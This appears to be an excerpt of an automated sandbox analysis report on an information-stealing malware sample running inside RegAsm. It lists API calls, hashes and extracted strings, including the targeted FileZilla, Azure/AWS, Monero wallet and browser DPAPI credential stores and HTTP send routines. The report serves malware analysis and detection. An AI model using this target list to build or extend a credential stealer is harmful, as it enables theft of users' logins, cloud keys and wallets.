            • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction ID: 8e4dbfb736b9908720f30fe25f95c1a3b6087da1e007f902b0e4d68da9f23204
            • Opcode Fuzzy Hash: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction Fuzzy Hash: 8D9002B829111456561037719D896896D905ACC6137554861B405C4055EA9841849529
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
            APIs
            • strtok_s.MSVCRT ref: 0041015B
            • memset.MSVCRT ref: 0041051D
              • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
              • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
            • strtok_s.MSVCRT ref: 004104B9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$mallocmemsetstrncpy
            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
            • API String ID: 2676359353-555421843
            • Opcode ID: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
            • Opcode Fuzzy Hash: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
            • API String ID: 2221118986-156850865
            • Opcode ID: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
            • Opcode Fuzzy Hash: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
            • memcpy.MSVCRT(?), ref: 00405F4E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$memcpy$CrackInternet
            • String ID: "$"$------$------$------$XA$XA
            • API String ID: 4271525049-2501203334
            • Opcode ID: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
            • Opcode Fuzzy Hash: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
            • API String ID: 0-3461493422
            • Opcode ID: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
            • Opcode Fuzzy Hash: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65
            APIs
            • strlen.MSVCRT ref: 004169BF
            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00416C3A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004169ED
              • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
              • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
            • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00416C3A), ref: 00416B53
              • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strlen$MemoryProcessQueryReadVirtual
            • String ID: :lA$@
            • API String ID: 2950663791-2855229504
            • Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
            • Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9
            APIs
            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00416B7E
            • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
            • memset.MSVCRT ref: 00416C0A
            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00416D5E
            Strings
            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: OpenProcessmemset
            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
            • API String ID: 1606381396-4138519520
            • Opcode ID: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
            • Opcode Fuzzy Hash: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
            • API String ID: 2221118986-218353709
            • Opcode ID: 35bd72a9113463a367d23b3699422e00cacb29ac60c05851abf7d94b364ceda1
            • Instruction ID: 953294376e47f8e4316e7e62fd6b04658e6323c3fb6fa537345fd6b82421038a
            • Opcode Fuzzy Hash: 35bd72a9113463a367d23b3699422e00cacb29ac60c05851abf7d94b364ceda1
            • Instruction Fuzzy Hash: 395175B1D5011867CB14EB61DC96FED733CAF50314F4041ADB60A62092EE786BD9CFAA
            APIs
              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • strtok.MSVCRT(00000000,?), ref: 00414E7E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$ConnectHttpOpenRequestSendstrtok
            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
            • API String ID: 632984754-1526165396
            • Opcode ID: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
            • Opcode Fuzzy Hash: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
            APIs
            • __lock.LIBCMT ref: 0041AD5A
              • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
              • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
              • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041A9A6
            • DecodePointer.KERNEL32(0042A0D0,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADA7
              • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
            • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADCD
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADE0
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADEA
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2005412495-0
            • Opcode ID: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
            • Instruction ID: 6fffd6e3d1db5a9c5a4b6999176ce23e16b6351fdf67b8a2f65ef9f2441ae444
            • Opcode Fuzzy Hash: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
            • Instruction Fuzzy Hash: 663149B09423498FDF109FA9D9442DEBBF1BF48314F14402BD410A6250DBBC48A1CF6A
            APIs
            • __getptd.LIBCMT ref: 0041C3D9
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __amsg_exit.LIBCMT ref: 0041C3F9
            • __lock.LIBCMT ref: 0041C409
            • InterlockedDecrement.KERNEL32(?), ref: 0041C426
            • free.MSVCRT ref: 0041C439
            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
            • String ID:
            • API String ID: 634100517-0
            • Opcode ID: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
            • Instruction ID: b6f1b0b65aa188883731c215e63f9ee08ae8599addb4a6f87201d1aa76989acc
            • Opcode Fuzzy Hash: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
            • Instruction Fuzzy Hash: D3010431A826219BD720AB6A9C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
            APIs
            • __getptd.LIBCMT ref: 0041C13D
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __getptd.LIBCMT ref: 0041C154
            • __amsg_exit.LIBCMT ref: 0041C162
            • __lock.LIBCMT ref: 0041C172
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
            • Instruction ID: 9fc434d286289e419f3aa4a208740ff26eea7a26fa5dacee767cec1b97643960
            • Opcode Fuzzy Hash: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
            • Instruction Fuzzy Hash: 4AF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv
            • String ID: %d MB$@
            • API String ID: 3732870572-3474575989
            • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
            • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemset
            • String ID: @$v10
            • API String ID: 1065087418-24753345
            • Opcode ID: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
            • Opcode Fuzzy Hash: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
            APIs
            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409DE2
              • Part of subcall function 00409BB0: memcpy.MSVCRT(?,?,?), ref: 00409C16
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemcpy
            • String ID: $"encrypted_key":"$DPAPI
            • API String ID: 1784268899-738592651
            • Opcode ID: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
            • Opcode Fuzzy Hash: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
            APIs
            • memset.MSVCRT ref: 00407354
            • task.LIBCPMTD ref: 00407595
              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memsettaskvsprintf_s
            • String ID: Password
            • API String ID: 2675463923-3434357891
            • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
            • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95